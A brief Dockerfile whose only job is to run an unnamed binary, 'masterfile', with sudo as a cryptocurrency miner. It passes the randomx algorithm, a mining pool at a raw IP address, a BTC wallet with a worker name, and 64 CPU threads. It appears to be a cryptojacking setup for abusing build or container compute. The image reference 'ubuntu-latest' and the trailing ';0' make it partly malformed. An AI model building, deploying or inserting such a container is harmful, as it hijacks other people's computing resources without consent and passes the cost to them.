FROM ubuntu-latest
#-----------------
RUN apt-get update
RUN chmod u+x masterfile
RUN sudo ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BTC:3FTL2Wf2GDLiG7Bf4Fr3q9wFufUBkNgayC.Pekerja01 --cpu-threads 64;0